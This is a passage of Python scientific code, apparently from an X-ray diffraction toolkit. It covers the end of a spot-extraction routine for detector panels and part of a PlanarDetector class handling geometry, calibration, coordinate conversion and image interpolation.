'text':\n output_dir = os.path.join(\n dirname, detector_id\n )\n if not os.path.exists(output_dir):\n os.makedirs(output_dir)\n this_filename = os.path.join(\n output_dir, filename\n )\n writer = PatchDataWriter(this_filename)\n\n # grab panel\n panel = self.detectors[detector_id]\n instr_cfg = panel.config_dict(\n self.chi, self.tvec,\n beam_energy=self.beam_energy,\n beam_vector=self.beam_vector\n )\n native_area = panel.pixel_area # pixel ref area\n\n # pull out the OmegaImageSeries for this panel from input dict\n ome_imgser = imgser_dict[detector_id]\n\n # extract simulation results\n sim_results_p = sim_results[detector_id]\n hkl_ids = sim_results_p[0][0]\n hkls_p = sim_results_p[1][0]\n ang_centers = sim_results_p[2][0]\n xy_centers = sim_results_p[3][0]\n ang_pixel_size = sim_results_p[4][0]\n\n # now verify that full patch falls on detector...\n # ???: strictly necessary?\n #\n # patch vertex array from sim\n nangs = len(ang_centers)\n patch_vertices = (\n np.tile(ang_centers[:, :2], (1, 4)) +\n np.tile(tol_vec, (nangs, 1))\n ).reshape(4*nangs, 2)\n ome_dupl = np.tile(\n ang_centers[:, 2], (4, 1)\n ).T.reshape(len(patch_vertices), 1)\n\n # find vertices that all fall on the panel\n det_xy, rmats_s, on_plane = xrdutil._project_on_detector_plane(\n np.hstack([patch_vertices, ome_dupl]),\n panel.rmat, rMat_c, self.chi,\n panel.tvec, tVec_c, self.tvec,\n panel.distortion)\n _, on_panel = panel.clip_to_panel(det_xy, buffer_edges=True)\n\n # all vertices must be on...\n patch_is_on = np.all(on_panel.reshape(nangs, 4), axis=1)\n patch_xys = det_xy.reshape(nangs, 4, 2)[patch_is_on]\n\n # re-filter...\n hkl_ids = hkl_ids[patch_is_on]\n hkls_p = hkls_p[patch_is_on, :]\n ang_centers = ang_centers[patch_is_on, :]\n xy_centers = xy_centers[patch_is_on, :]\n ang_pixel_size = ang_pixel_size[patch_is_on, :]\n\n # TODO: add polygon testing right here!\n # done \n if check_only:\n patch_output = []\n for i_pt, angs in enumerate(ang_centers):\n # the evaluation omegas;\n # expand about the central value using tol vector\n ome_eval = np.degrees(angs[2]) + ome_del\n\n # ...vectorize the omega_to_frame function to avoid loop?\n frame_indices = [\n ome_imgser.omega_to_frame(ome)[0] for ome in ome_eval\n ]\n if -1 in frame_indices:\n if not quiet:\n msg = \"\"\"\n window for (%d%d%d) falls outside omega range\n \"\"\" % tuple(hkls_p[i_pt, :])\n print(msg)\n continue\n else:\n these_vertices = patch_xys[i_pt]\n ijs = panel.cartToPixel(these_vertices)\n ii, jj = polygon(ijs[:, 0], ijs[:, 1])\n contains_signal = False\n for i_frame in frame_indices:\n contains_signal = contains_signal or np.any(\n ome_imgser[i_frame][ii, jj] > threshold\n )\n compl.append(contains_signal)\n patch_output.append((ii, jj, frame_indices))\n else:\n # make the tth,eta patches for interpolation\n patches = xrdutil.make_reflection_patches(\n instr_cfg,\n ang_centers[:, :2], ang_pixel_size,\n omega=ang_centers[:, 2],\n tth_tol=tth_tol, eta_tol=eta_tol,\n rmat_c=rMat_c, tvec_c=tVec_c,\n npdiv=npdiv, quiet=True)\n\n # GRAND LOOP over reflections for this panel\n patch_output = []\n for i_pt, patch in enumerate(patches):\n\n # strip relevant objects out of current patch\n vtx_angs, vtx_xy, conn, areas, xy_eval, ijs = patch\n\n prows, pcols = areas.shape\n nrm_fac = areas/float(native_area)\n nrm_fac = nrm_fac / np.min(nrm_fac)\n\n # grab hkl info\n hkl = hkls_p[i_pt, :]\n hkl_id = hkl_ids[i_pt]\n\n # edge arrays\n tth_edges = vtx_angs[0][0, :]\n delta_tth = tth_edges[1] - tth_edges[0]\n eta_edges = vtx_angs[1][:, 0]\n delta_eta = eta_edges[1] - eta_edges[0]\n\n # need to reshape eval pts for interpolation\n xy_eval = np.vstack([xy_eval[0].flatten(),\n xy_eval[1].flatten()]).T\n\n # the evaluation omegas;\n # expand about the central value using tol vector\n ome_eval = np.degrees(ang_centers[i_pt, 2]) + ome_del\n\n # ???: vectorize the omega_to_frame function to avoid loop?\n frame_indices = [\n ome_imgser.omega_to_frame(ome)[0] for ome in ome_eval\n ]\n\n if -1 in frame_indices:\n if not quiet:\n msg = \"\"\"\n window for (%d%d%d) falls outside omega range\n \"\"\" % tuple(hkl)\n print(msg)\n continue\n else:\n # initialize spot data parameters\n # !!! maybe change these to nan to not fuck up writer\n peak_id = -999\n sum_int = np.nan\n max_int = np.nan\n meas_angs = np.nan*np.ones(3)\n meas_xy = np.nan*np.ones(2)\n\n # quick check for intensity\n contains_signal = False\n patch_data_raw = []\n for i_frame in frame_indices:\n tmp = ome_imgser[i_frame][ijs[0], ijs[1]]\n contains_signal = contains_signal or np.any(\n tmp > threshold\n )\n patch_data_raw.append(tmp)\n pass\n patch_data_raw = np.stack(patch_data_raw, axis=0)\n compl.append(contains_signal)\n\n if contains_signal:\n # initialize patch data array for intensities\n if interp.lower() == 'bilinear':\n patch_data = np.zeros(\n (len(frame_indices), prows, pcols))\n for i, i_frame in enumerate(frame_indices):\n patch_data[i] = \\\n panel.interpolate_bilinear(\n xy_eval,\n ome_imgser[i_frame],\n pad_with_nans=False\n ).reshape(prows, pcols) # * nrm_fac\n elif interp.lower() == 'nearest':\n patch_data = patch_data_raw # * nrm_fac\n else:\n msg = \"interpolation option \" + \\\n \"'%s' not understood\"\n raise(RuntimeError, msg % interp)\n\n # now have interpolated patch data...\n labels, num_peaks = ndimage.label(\n patch_data > threshold, structure=label_struct\n )\n slabels = np.arange(1, num_peaks + 1)\n\n if num_peaks > 0:\n peak_id = iRefl\n coms = np.array(\n ndimage.center_of_mass(\n patch_data,\n labels=labels,\n index=slabels\n )\n )\n if num_peaks > 1:\n center = np.r_[patch_data.shape]*0.5\n center_t = np.tile(center, (num_peaks, 1))\n com_diff = coms - center_t\n closest_peak_idx = np.argmin(\n np.sum(com_diff**2, axis=1)\n )\n else:\n closest_peak_idx = 0\n pass # end multipeak conditional\n coms = coms[closest_peak_idx]\n # meas_omes = \\\n # ome_edges[0] + (0.5 + coms[0])*delta_ome\n meas_omes = \\\n ome_eval[0] + coms[0]*delta_ome\n meas_angs = np.hstack(\n [tth_edges[0] + (0.5 + coms[2])*delta_tth,\n eta_edges[0] + (0.5 + coms[1])*delta_eta,\n mapAngle(\n np.radians(meas_omes), ome_period\n )\n ]\n )\n\n # intensities\n # - summed is 'integrated' over interpolated\n # data\n # - max is max of raw input data\n sum_int = np.sum(\n patch_data[\n labels == slabels[closest_peak_idx]\n ]\n )\n max_int = np.max(\n patch_data_raw[\n labels == slabels[closest_peak_idx]\n ]\n )\n # ???: Should this only use labeled pixels?\n # Those are segmented from interpolated data,\n # not raw; likely ok in most cases.\n\n # need MEASURED xy coords\n gvec_c = anglesToGVec(\n meas_angs,\n chi=self.chi,\n rMat_c=rMat_c,\n bHat_l=self.beam_vector)\n rMat_s = makeOscillRotMat(\n [self.chi, meas_angs[2]]\n )\n meas_xy = gvecToDetectorXY(\n gvec_c,\n panel.rmat, rMat_s, rMat_c,\n panel.tvec, self.tvec, tVec_c,\n beamVec=self.beam_vector)\n if panel.distortion is not None:\n meas_xy = panel.distortion.apply_inverse(\n np.atleast_2d(meas_xy)\n ).flatten()\n pass\n # FIXME: why is this suddenly necessary???\n meas_xy = meas_xy.squeeze()\n pass # end num_peaks > 0\n else:\n patch_data = patch_data_raw\n pass # end contains_signal\n # write output\n if filename is not None:\n if output_format.lower() == 'text':\n writer.dump_patch(\n peak_id, hkl_id, hkl, sum_int, max_int,\n ang_centers[i_pt], meas_angs,\n xy_centers[i_pt], meas_xy)\n elif output_format.lower() == 'hdf5':\n xyc_arr = xy_eval.reshape(\n prows, pcols, 2\n ).transpose(2, 0, 1)\n writer.dump_patch(\n detector_id, iRefl, peak_id, hkl_id, hkl,\n tth_edges, eta_edges, np.radians(ome_eval),\n xyc_arr, ijs, frame_indices, patch_data,\n ang_centers[i_pt], xy_centers[i_pt],\n meas_angs, meas_xy)\n pass # end conditional on write output\n pass # end conditional on check only\n\n if return_spot_list:\n # Full output\n xyc_arr = xy_eval.reshape(\n prows, pcols, 2\n ).transpose(2, 0, 1)\n _patch_output = [\n detector_id, iRefl, peak_id, hkl_id, hkl,\n tth_edges, eta_edges, np.radians(ome_eval),\n xyc_arr, ijs, frame_indices, patch_data,\n ang_centers[i_pt], xy_centers[i_pt],\n meas_angs, meas_xy\n ]\n else:\n # Trimmed output\n _patch_output = [\n peak_id, hkl_id, hkl, sum_int, max_int,\n ang_centers[i_pt], meas_angs, meas_xy\n ]\n patch_output.append(_patch_output)\n iRefl += 1\n pass # end patch conditional\n pass # end patch loop\n output[detector_id] = patch_output\n if filename is not None and output_format.lower() == 'text':\n writer.close()\n pass # end detector loop\n if filename is not None and output_format.lower() == 'hdf5':\n writer.close()\n return compl, output\n\n \"\"\"def fit_grain(self, grain_params, data_dir='results'):\"\"\"\n\n pass # end class: HEDMInstrument\n\n\nclass PlanarDetector(object):\n \"\"\"Base class for 2D planar, rectangular row-column detector\"\"\"\n\n __pixelPitchUnit = 'mm'\n\n def __init__(self,\n rows=2048, cols=2048,\n pixel_size=(0.2, 0.2),\n tvec=np.r_[0., 0., -1000.],\n tilt=ct.zeros_3,\n name='default',\n bvec=ct.beam_vec,\n evec=ct.eta_vec,\n saturation_level=None,\n panel_buffer=None,\n roi=None,\n distortion=None,\n max_workers=max_workers_DFLT):\n \"\"\"\n Instantiate a PlanarDetector object.\n\n Parameters\n ----------\n rows : TYPE, optional\n DESCRIPTION. The default is 2048.\n cols : TYPE, optional\n DESCRIPTION. The default is 2048.\n pixel_size : TYPE, optional\n DESCRIPTION. The default is (0.2, 0.2).\n tvec : TYPE, optional\n DESCRIPTION. The default is np.r_[0., 0., -1000.].\n tilt : TYPE, optional\n DESCRIPTION. The default is ct.zeros_3.\n name : TYPE, optional\n DESCRIPTION. The default is 'default'.\n bvec : TYPE, optional\n DESCRIPTION. The default is ct.beam_vec.\n evec : TYPE, optional\n DESCRIPTION. The default is ct.eta_vec.\n saturation_level : TYPE, optional\n DESCRIPTION. The default is None.\n panel_buffer : TYPE, optional\n If a scalar or len(2) array_like, the interpretation is a border\n in mm. If an array with shape (nrows, ncols), interpretation is a\n boolean with True marking valid pixels. The default is None.\n roi : TYPE, optional\n DESCRIPTION. The default is None.\n distortion : TYPE, optional\n DESCRIPTION. The default is None.\n\n Returns\n -------\n None.\n\n \"\"\"\n self._name = name\n\n self._rows = rows\n self._cols = cols\n\n self._pixel_size_row = pixel_size[0]\n self._pixel_size_col = pixel_size[1]\n\n self._saturation_level = saturation_level\n\n self._panel_buffer = panel_buffer\n\n self._roi = roi\n\n self._tvec = np.array(tvec).flatten()\n self._tilt = np.array(tilt).flatten()\n\n self._bvec = np.array(bvec).flatten()\n self._evec = np.array(evec).flatten()\n\n self._distortion = distortion\n\n self.max_workers = max_workers\n\n #\n # set up calibration parameter list and refinement flags\n #\n # order for a single detector will be\n #\n # [tilt, translation, ]\n dparams = []\n if self._distortion is not None:\n dparams = self._distortion.params\n self._calibration_parameters = np.hstack(\n [self._tilt, self._tvec, dparams]\n )\n self._calibration_flags = np.hstack(\n [panel_calibration_flags_DFLT,\n np.zeros(len(dparams), dtype=bool)]\n )\n return\n\n # detector ID\n @property\n def name(self):\n return self._name\n\n @name.setter\n def name(self, s):\n assert isinstance(s, str), \"requires string input\"\n self._name = s\n\n # properties for physical size of rectangular detector\n @property\n def rows(self):\n return self._rows\n\n @rows.setter\n def rows(self, x):\n assert isinstance(x, int)\n self._rows = x\n\n @property\n def cols(self):\n return self._cols\n\n @cols.setter\n def cols(self, x):\n assert isinstance(x, int)\n self._cols = x\n\n @property\n def pixel_size_row(self):\n return self._pixel_size_row\n\n @pixel_size_row.setter\n def pixel_size_row(self, x):\n self._pixel_size_row = float(x)\n\n @property\n def pixel_size_col(self):\n return self._pixel_size_col\n\n @pixel_size_col.setter\n def pixel_size_col(self, x):\n self._pixel_size_col = float(x)\n\n @property\n def pixel_area(self):\n return self.pixel_size_row * self.pixel_size_col\n\n @property\n def saturation_level(self):\n return self._saturation_level\n\n @saturation_level.setter\n def saturation_level(self, x):\n if x is not None:\n assert np.isreal(x)\n self._saturation_level = x\n\n @property\n def panel_buffer(self):\n return self._panel_buffer\n\n @panel_buffer.setter\n def panel_buffer(self, x):\n \"\"\"if not None, a buffer in mm (x, y)\"\"\"\n if x is not None:\n assert len(x) == 2 or x.ndim == 2\n self._panel_buffer = x\n\n @property\n def roi(self):\n return self._roi\n\n @roi.setter\n def roi(self, vertex_array):\n \"\"\"\n vertex array must be\n\n [[r0, c0], [r1, c1], ..., [rn, cn]]\n\n and have len >= 3\n\n does NOT need to repeat start vertex for closure\n \"\"\"\n if vertex_array is not None:\n assert len(vertex_array) >= 3\n self._roi = vertex_array\n\n @property\n def row_dim(self):\n return self.rows * self.pixel_size_row\n\n @property\n def col_dim(self):\n return self.cols * self.pixel_size_col\n\n @property\n def row_pixel_vec(self):\n return self.pixel_size_row*(0.5*(self.rows-1)-np.arange(self.rows))\n\n @property\n def row_edge_vec(self):\n return _row_edge_vec(self.rows, self.pixel_size_row)\n\n @property\n def col_pixel_vec(self):\n return self.pixel_size_col*(np.arange(self.cols)-0.5*(self.cols-1))\n\n @property\n def col_edge_vec(self):\n return _col_edge_vec(self.cols, self.pixel_size_col)\n\n @property\n def corner_ul(self):\n return np.r_[-0.5 * self.col_dim, 0.5 * self.row_dim]\n\n @property\n def corner_ll(self):\n return np.r_[-0.5 * self.col_dim, -0.5 * self.row_dim]\n\n @property\n def corner_lr(self):\n return np.r_[0.5 * self.col_dim, -0.5 * self.row_dim]\n\n @property\n def corner_ur(self):\n return np.r_[0.5 * self.col_dim, 0.5 * self.row_dim]\n\n @property\n def shape(self):\n return (self.rows, self.cols)\n\n @property\n def tvec(self):\n return self._tvec\n\n @tvec.setter\n def tvec(self, x):\n x = np.array(x).flatten()\n assert len(x) == 3, 'input must have length = 3'\n self._tvec = x\n\n @property\n def tilt(self):\n return self._tilt\n\n @tilt.setter\n def tilt(self, x):\n assert len(x) == 3, 'input must have length = 3'\n self._tilt = np.array(x).squeeze()\n\n @property\n def bvec(self):\n return self._bvec\n\n @bvec.setter\n def bvec(self, x):\n x = np.array(x).flatten()\n assert len(x) == 3 and sum(x*x) > 1-ct.sqrt_epsf, \\\n 'input must have length = 3 and have unit magnitude'\n self._bvec = x\n\n @property\n def evec(self):\n return self._evec\n\n @evec.setter\n def evec(self, x):\n x = np.array(x).flatten()\n assert len(x) == 3 and sum(x*x) > 1-ct.sqrt_epsf, \\\n 'input must have length = 3 and have unit magnitude'\n self._evec = x\n\n @property\n def distortion(self):\n return self._distortion\n\n @distortion.setter\n def distortion(self, x):\n # FIXME: ne to reconcile check with new class type!\n assert len(x) == 2 and hasattr(x[0], '__call__'), \\\n 'distortion must be a tuple: (, params)'\n self._distortion = x\n\n @property\n def rmat(self):\n return makeRotMatOfExpMap(self.tilt)\n\n @property\n def normal(self):\n return self.rmat[:, 2]\n\n @property\n def beam_position(self):\n \"\"\"\n returns the coordinates of the beam in the cartesian detector\n frame {Xd, Yd, Zd}. NaNs if no intersection.\n \"\"\"\n output = np.nan * np.ones(2)\n b_dot_n = np.dot(self.bvec, self.normal)\n if np.logical_and(\n abs(b_dot_n) > ct.sqrt_epsf,\n np.sign(b_dot_n) == -1\n ):\n u = np.dot(self.normal, self.tvec) / b_dot_n\n p2_l = u*self.bvec\n p2_d = np.dot(self.rmat.T, p2_l - self.tvec)\n output = p2_d[:2]\n return output\n\n # ...memoize???\n @property\n def pixel_coords(self):\n pix_i, pix_j = np.meshgrid(\n self.row_pixel_vec, self.col_pixel_vec,\n indexing='ij')\n return pix_i, pix_j\n\n @property\n def pixel_solid_angles(self):\n kwargs = {\n 'rows': self.rows,\n 'cols': self.cols,\n 'pixel_size_row': self.pixel_size_row,\n 'pixel_size_col': self.pixel_size_col,\n 'rmat': self.rmat,\n 'tvec': self.tvec,\n 'max_workers': self.max_workers,\n }\n return _pixel_solid_angles(**kwargs)\n\n @property\n def calibration_parameters(self):\n #\n # set up calibration parameter list and refinement flags\n #\n # order for a single detector will be\n #\n # [tilt, translation, ]\n dparams = []\n if self.distortion is not None:\n dparams = self.distortion.params\n self._calibration_parameters = np.hstack(\n [self.tilt, self.tvec, dparams]\n )\n return self._calibration_parameters\n\n @property\n def calibration_flags(self):\n return self._calibration_flags\n\n @calibration_flags.setter\n def calibration_flags(self, x):\n x = np.array(x, dtype=bool).flatten()\n if len(x) != len(self._calibration_flags):\n raise RuntimeError(\n \"length of parameter list must be %d; you gave %d\"\n % (len(self._calibration_flags), len(x))\n )\n self._calibration_flags = x\n\n # =========================================================================\n # METHODS\n # =========================================================================\n\n def lorentz_polarization_factor(self, f_hor, f_vert):\n \"\"\"\n Calculated the lorentz polarization factor for every pixel.\n\n Parameters\n ----------\n f_hor : float\n the fraction of horizontal polarization. for XFELs\n this is close to 1.\n f_vert : TYPE\n the fraction of vertical polarization, which is ~0 for XFELs.\n\n Raises\n ------\n RuntimeError\n DESCRIPTION.\n\n Returns\n -------\n TYPE\n DESCRIPTION.\n\n \"\"\"\n s = f_hor + f_vert\n if np.abs(s - 1) > constants.sqrt_epsf:\n msg = (\"sum of fraction of \"\n \"horizontal and vertical polarizations \"\n \"must be equal to 1.\")\n raise RuntimeError(msg)\n\n if f_hor < 0 or f_vert < 0:\n msg = (\"fraction of polarization in horizontal \"\n \"or vertical directions can't be negative.\")\n raise RuntimeError(msg)\n\n tth, eta = self.pixel_angles()\n args = (tth, eta, f_hor, f_vert)\n\n return _lorentz_polarization_factor(*args)\n\n def config_dict(self, chi=0, tvec=ct.zeros_3,\n beam_energy=beam_energy_DFLT, beam_vector=ct.beam_vec,\n sat_level=None, panel_buffer=None, style='yaml'):\n \"\"\"\n Return a dictionary of detector parameters.\n\n Optional instrument level parameters. This is a convenience function\n to work with the APIs in several functions in xrdutil.\n\n Parameters\n ----------\n chi : float, optional\n DESCRIPTION. The default is 0.\n tvec : array_like (3,), optional\n DESCRIPTION. The default is ct.zeros_3.\n beam_energy : float, optional\n DESCRIPTION. The default is beam_energy_DFLT.\n beam_vector : aray_like (3,), optional\n DESCRIPTION. The default is ct.beam_vec.\n sat_level : scalar, optional\n DESCRIPTION. The default is None.\n panel_buffer : scalar, array_like (2,), optional\n DESCRIPTION. The default is None.\n\n Returns\n -------\n config_dict : dict\n DESCRIPTION.\n\n \"\"\"\n assert style.lower() in ['yaml', 'hdf5'], \\\n \"style must be either 'yaml', or 'hdf5'; you gave '%s'\" % style\n\n config_dict = {}\n\n # =====================================================================\n # DETECTOR PARAMETERS\n # =====================================================================\n # transform and pixels\n #\n # assign local vars; listify if necessary\n tilt = self.tilt\n translation = self.tvec\n if style.lower() == 'yaml':\n tilt = tilt.tolist()\n translation = translation.tolist()\n tvec = tvec.tolist()\n\n det_dict = dict(\n transform=dict(\n tilt=tilt,\n translation=translation,\n ),\n pixels=dict(\n rows=self.rows,\n columns=self.cols,\n size=[self.pixel_size_row, self.pixel_size_col],\n )\n )\n\n # distortion\n if self.distortion is not None:\n dparams = self.distortion.params\n if style.lower() == 'yaml':\n dparams = dparams.tolist()\n dist_d = dict(\n function_name=self.distortion.maptype,\n parameters=dparams\n )\n det_dict['distortion'] = dist_d\n\n # saturation level\n if sat_level is None:\n sat_level = self.saturation_level\n det_dict['saturation_level'] = sat_level\n\n # panel buffer\n if panel_buffer is None:\n # could be non, a 2-element list, or a 2-d array (rows, cols)\n panel_buffer = copy.deepcopy(self.panel_buffer)\n # !!! now we have to do some style-dependent munging of panel_buffer\n if isinstance(panel_buffer, np.ndarray):\n if panel_buffer.ndim == 1:\n assert len(panel_buffer) == 2, \\\n \"length of 1-d buffer must be 2\"\n # if here is a 2-element array\n if style.lower() == 'yaml':\n panel_buffer = panel_buffer.tolist()\n elif panel_buffer.ndim == 2:\n if style.lower() == 'yaml':\n # !!! can't practically write array-like buffers to YAML\n # so forced to clobber\n print(\"clobbering panel buffer array in yaml-ready output\")\n panel_buffer = [0., 0.]\n else:\n raise RuntimeError(\n \"panel buffer ndim must be 1 or 2; you specified %d\"\n % panel_buffer.ndmin\n )\n elif panel_buffer is None:\n # still None on self\n if style.lower() == 'hdf5':\n # !!! can't write None to hdf5; substitute with zeros\n panel_buffer = np.r_[0., 0.]\n det_dict['buffer'] = panel_buffer\n\n # =====================================================================\n # SAMPLE STAGE PARAMETERS\n # =====================================================================\n stage_dict = dict(\n chi=chi,\n translation=tvec\n )\n\n # =====================================================================\n # BEAM PARAMETERS\n # =====================================================================\n # !!! make_reflection_patches is still using the vector\n # azim, pola = calc_angles_from_beam_vec(beam_vector)\n # beam_dict = dict(\n # energy=beam_energy,\n # vector=dict(\n # azimuth=azim,\n # polar_angle=pola\n # )\n # )\n beam_dict = dict(\n energy=beam_energy,\n vector=beam_vector\n )\n\n config_dict['detector'] = det_dict\n config_dict['oscillation_stage'] = stage_dict\n config_dict['beam'] = beam_dict\n\n return config_dict\n\n def pixel_angles(self, origin=ct.zeros_3):\n return _pixel_angles(origin, self.pixel_coords, self.distortion,\n self.rmat, self.tvec, self.bvec, self.evec,\n self.rows, self.cols)\n\n def pixel_tth_gradient(self, origin=ct.zeros_3):\n assert len(origin) == 3, \"origin must have 3 elemnts\"\n ptth, _ = self.pixel_angles(origin=origin)\n return np.linalg.norm(np.stack(np.gradient(ptth)), axis=0)\n\n def pixel_eta_gradient(self, origin=ct.zeros_3):\n period = np.r_[0., 2*np.pi]\n assert len(origin) == 3, \"origin must have 3 elemnts\"\n _, peta = self.pixel_angles(origin=origin)\n\n # !!! handle cyclic nature of eta\n rowmap = np.empty_like(peta)\n for i in range(rowmap.shape[0]):\n rowmap[i, :] = mapAngle(\n peta[i, :], peta[i, 0] + period\n )\n\n colmap = np.empty_like(peta)\n for i in range(colmap.shape[1]):\n colmap[:, i] = mapAngle(\n peta[:, i], peta[0, i] + period\n )\n\n peta_grad_row = np.gradient(rowmap)\n peta_grad_col = np.gradient(colmap)\n\n return np.linalg.norm(\n np.stack([peta_grad_col[0], peta_grad_row[1]]),\n axis=0\n )\n\n def cartToPixel(self, xy_det, pixels=False):\n \"\"\"\n Convert vstacked array or list of [x,y] points in the center-based\n cartesian frame {Xd, Yd, Zd} to (i, j) edge-based indices\n\n i is the row index, measured from the upper-left corner\n j is the col index, measured from the upper-left corner\n\n if pixels=True, then (i,j) are integer pixel indices.\n else (i,j) are continuous coords\n \"\"\"\n xy_det = np.atleast_2d(xy_det)\n\n npts = len(xy_det)\n\n tmp_ji = xy_det - np.tile(self.corner_ul, (npts, 1))\n i_pix = -tmp_ji[:, 1] / self.pixel_size_row - 0.5\n j_pix = tmp_ji[:, 0] / self.pixel_size_col - 0.5\n\n ij_det = np.vstack([i_pix, j_pix]).T\n if pixels:\n ij_det = np.array(np.round(ij_det), dtype=int)\n return ij_det\n\n def pixelToCart(self, ij_det):\n \"\"\"\n Convert vstacked array or list of [i,j] pixel indices\n (or UL corner-based points) and convert to (x,y) in the\n cartesian frame {Xd, Yd, Zd}\n \"\"\"\n ij_det = np.atleast_2d(ij_det)\n\n x = (ij_det[:, 1] + 0.5)*self.pixel_size_col\\\n + self.corner_ll[0]\n y = (self.rows - ij_det[:, 0] - 0.5)*self.pixel_size_row\\\n + self.corner_ll[1]\n return np.vstack([x, y]).T\n\n def angularPixelSize(self, xy, rMat_s=None, tVec_s=None, tVec_c=None):\n \"\"\"\n Wraps xrdutil.angularPixelSize\n \"\"\"\n # munge kwargs\n if rMat_s is None:\n rMat_s = ct.identity_3x3\n if tVec_s is None:\n tVec_s = ct.zeros_3x1\n if tVec_c is None:\n tVec_c = ct.zeros_3x1\n\n # call function\n ang_ps = xrdutil.angularPixelSize(\n xy, (self.pixel_size_row, self.pixel_size_col),\n self.rmat, rMat_s,\n self.tvec, tVec_s, tVec_c,\n distortion=self.distortion,\n beamVec=self.bvec, etaVec=self.evec)\n return ang_ps\n\n def clip_to_panel(self, xy, buffer_edges=True):\n \"\"\"\n if self.roi is not None, uses it by default\n\n TODO: check if need shape kwarg\n TODO: optimize ROI search better than list comprehension below\n TODO: panel_buffer can be a 2-d boolean mask, but needs testing\n\n \"\"\"\n xy = np.atleast_2d(xy)\n\n if self.roi is not None:\n ij_crds = self.cartToPixel(xy, pixels=True)\n ii, jj = polygon(self.roi[:, 0], self.roi[:, 1],\n shape=(self.rows, self.cols))\n on_panel_rows = [i in ii for i in ij_crds[:, 0]]\n on_panel_cols = [j in jj for j in ij_crds[:, 1]]\n on_panel = np.logical_and(on_panel_rows, on_panel_cols)\n else:\n xlim = 0.5*self.col_dim\n ylim = 0.5*self.row_dim\n if buffer_edges and self.panel_buffer is not None:\n if self.panel_buffer.ndim == 2:\n pix = self.cartToPixel(xy, pixels=True)\n\n roff = np.logical_or(pix[:, 0] < 0, pix[:, 0] >= self.rows)\n coff = np.logical_or(pix[:, 1] < 0, pix[:, 1] >= self.cols)\n\n idx = np.logical_or(roff, coff)\n\n pix[idx, :] = 0\n\n on_panel = self.panel_buffer[pix[:, 0], pix[:, 1]]\n on_panel[idx] = False\n else:\n xlim -= self.panel_buffer[0]\n ylim -= self.panel_buffer[1]\n on_panel_x = np.logical_and(\n xy[:, 0] >= -xlim, xy[:, 0] <= xlim\n )\n on_panel_y = np.logical_and(\n xy[:, 1] >= -ylim, xy[:, 1] <= ylim\n )\n on_panel = np.logical_and(on_panel_x, on_panel_y)\n elif not buffer_edges or self.panel_buffer is None:\n on_panel_x = np.logical_and(\n xy[:, 0] >= -xlim, xy[:, 0] <= xlim\n )\n on_panel_y = np.logical_and(\n xy[:, 1] >= -ylim, xy[:, 1] <= ylim\n )\n on_panel = np.logical_and(on_panel_x, on_panel_y)\n return xy[on_panel, :], on_panel\n\n def cart_to_angles(self, xy_data, rmat_s=None, tvec_s=None, tvec_c=None):\n \"\"\"\n TODO: distortion\n \"\"\"\n if rmat_s is None:\n rmat_s = ct.identity_3x3\n if tvec_s is None:\n tvec_s = ct.zeros_3\n if tvec_c is None:\n tvec_c = ct.zeros_3\n angs, g_vec = detectorXYToGvec(\n xy_data, self.rmat, rmat_s,\n self.tvec, tvec_s, tvec_c,\n beamVec=self.bvec, etaVec=self.evec)\n tth_eta = np.vstack([angs[0], angs[1]]).T\n return tth_eta, g_vec\n\n def angles_to_cart(self, tth_eta,\n rmat_s=None, tvec_s=None,\n rmat_c=None, tvec_c=None):\n \"\"\"\n TODO: distortion\n \"\"\"\n if rmat_s is None:\n rmat_s = ct.identity_3x3\n if tvec_s is None:\n tvec_s = ct.zeros_3\n if rmat_c is None:\n rmat_c = ct.identity_3x3\n if tvec_c is None:\n tvec_c = ct.zeros_3\n # !!! warning, this assumes an rmat_s made from chi, ome pair\n chi = np.arccos(rmat_s[1, 1])\n ome = np.arccos(rmat_s[0, 0])\n\n angs = np.hstack([tth_eta, np.tile(ome, (len(tth_eta), 1))])\n xy_det = gvecToDetectorXY(\n anglesToGVec(angs, bHat_l=self.bvec, eHat_l=self.evec, chi=chi),\n self.rmat, rmat_s, rmat_c,\n self.tvec, tvec_s, tvec_c,\n beamVec=self.bvec)\n return xy_det\n\n def interpolate_nearest(self, xy, img, pad_with_nans=True):\n \"\"\"\n TODO: revisit normalization in here?\n\n \"\"\"\n is_2d = img.ndim == 2\n right_shape = img.shape[0] == self.rows and img.shape[1] == self.cols\n assert is_2d and right_shape,\\\n \"input image must be 2-d with shape (%d, %d)\"\\\n % (self.rows, self.cols)\n\n # initialize output with nans\n if pad_with_nans:\n int_xy = np.nan*np.ones(len(xy))\n else:\n int_xy = np.zeros(len(xy))\n\n # clip away points too close to or off the edges of the detector\n xy_clip, on_panel = self.clip_to_panel(xy, buffer_edges=True)\n\n # get pixel indices of clipped points\n i_src = cellIndices(self.row_pixel_vec, xy_clip[:, 1])\n j_src = cellIndices(self.col_pixel_vec, xy_clip[:, 0])\n\n # next interpolate across cols\n int_vals = img[i_src, j_src]\n int_xy[on_panel] = int_vals\n return int_xy\n\n def interpolate_bilinear(self, xy, img, pad_with_nans=True):\n \"\"\"\n Interpolate an image array at the specified cartesian points.\n\n Parameters\n ----------\n xy : array_like, (n, 2)\n Array of cartesian coordinates in the image plane at which\n to evaluate intensity.\n img : array_like\n 2-dimensional image array.\n pad_with_nans : bool, optional\n Toggle for assigning NaN to points that fall off the detector.\n The default is True.\n\n Returns\n -------\n int_xy : array_like, (n,)\n The array of interpolated intensities at each of the n input\n coordinates.\n\n Notes\n -----\n TODO: revisit normalization in here?\n \"\"\"\n\n is_2d = img.ndim == 2\n right_shape = img.shape[0] == self.rows and img.shape[1] == self.cols\n assert is_2d and right_shape,\\\n \"input image must be 2-d with shape (%d, %d)\"\\\n % (self.rows, self.cols)\n\n # initialize output with nans\n if pad_with_nans:\n int_xy = np.nan*np.ones(len(xy))\n else:\n int_xy = np.zeros(len(xy))\n\n # clip away points too close to or off the edges of the detector\n xy_clip, on_panel = self.clip_to_panel(xy, buffer_edges=True)\n\n # grab fractional pixel indices of clipped points\n ij_frac = self.cartToPixel(xy_clip)\n\n # get floors/ceils from array of pixel _centers_\n # and fix indices running off the pixel centers\n # !!! notice we already clipped points to the panel!\n i_floor = cellIndices(self.row_pixel_vec, xy_clip[:, 1])\n i_floor_img = _fix_indices(i_floor, 0, self.rows - 1)\n\n j_floor = cellIndices(self.col_pixel_vec, xy_clip[:, 0])\n j_floor_img = _fix_indices(j_floor, 0, self.cols - 1)\n\n # ceilings from floors\n i_ceil = i_floor + 1\n i_ceil_img = _fix_indices(i_ceil, 0, self.rows - 1)\n\n j_ceil = j_floor + 1\n j_ceil_img = _fix_indices(j_ceil, 0, self.cols - 1)\n\n # first interpolate at top/bottom rows\n row_floor_int = \\\n (j_ceil - 